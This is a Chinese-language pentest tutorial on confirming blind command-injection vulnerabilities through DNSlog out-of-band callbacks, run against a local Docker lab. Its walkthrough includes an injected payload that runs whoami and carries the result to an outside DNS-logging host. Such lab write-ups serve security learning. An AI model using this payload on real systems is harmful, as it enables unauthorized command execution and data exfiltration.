通過DNSLOG回顯驗證漏洞
前言
實際滲透測試中,有些漏洞因為沒有回顯導致無法準確判斷漏洞是否存在,可能導致滲透測試人員浪費大量精力在一個並不存在的漏洞上,因此為了驗證一些無回顯漏洞,可結合DNSlog平臺進行測試,本文使用的DNSlog平臺連結如下:http://dnslog.cn/
原理
DNSlog檢測原理在此就不多贅述了,網上相關資料鋪天蓋地,此處引用一張FREEBUF的圖用以說明,此圖現在看不懂沒關係,當做完實驗後再返回檢視本圖思維就會很清晰了。
環境搭建
1. 安裝Docker
接下來直接搭建靶場,進入實驗環境,本實驗使用Docker搭建漏洞環境,作業系統是windows 10,Docker Desktop提供了較為完善的圖形化操作介面,且相容性隨著版本更新目前已經與linux下執行的Docker無區別,安裝方式見官網,安裝操作較為簡單,無腦下一步即可,安裝完成後需要重啟,接著按照說明一步步安裝其他必備環境,這裡就不再細說了。
2.拉取映象
-
開啟CMD/PowerShell執行以下命令:
docker pull ge592555078/lkwa從倉庫拉取映象 -
接著開啟Docker Desktop按照下圖操作執行剛才拉取的環境,並將80埠對映到本地的81埠。
// 或者在命令列中直接輸入docker run -d -p 81:80 ge592555078/lkwa
-
此時訪問
http://localhost:81/應當出現apache的預設頁面,證明環境搭建完成:
漏洞復現
由於主要學習dnslog的使用,我們就用環境中命令執行模組復現。
- 訪問
http://localhost:81/index.php此為漏洞環境的主頁 - 左側選擇
Bind RCE命令注入環境 - 此時訪問dnslog平臺:
http://dnslog.cn/點選頁面上Get SubDomain生成專屬子域名
-
回到漏洞環境,在右側命令執行輸入框中輸入如下命令之後點選
submit按鈕提交執行。(whoami後應該銜接剛才生成的對應子域名)ping `whoami`.cp2wj5.dnslog.cn -
再返回DNSlog平臺,點選重新整理解析記錄按鈕,可以發現whoami的執行結果已經拼接成四級域名了:
至此為止試驗結束。
分析總結
存在無回顯漏洞的主機訪問DNSlog平臺就會留下DNS解析記錄,可以通過DNS解析記錄檢視最終的執行結果,如示例中的語句:
ping `whoami`.cp2wj5.dnslog.cn
此語句實際上是:
ping www-data.yafjqc.dnslog.cn
包圍著whoami的符號是反單引號,是shift+~組合打出來的符號,表示執行命令的意思,那麼最終ping的結果就是ping whoami執行後的主機名.隨機三級域名.dnslog.cn,解析的時候一層一層的迭代解析,最終指向dnslog.cn伺服器上你的專屬三級域名,並附帶上執行結果(四級域名),那麼此時看dnslog伺服器的DNS解析記錄即可檢視whoami的執行結果,如果對DNS協議不清楚此時應先去學習DNS解析原理,不然此篇文章學習起來較為吃力。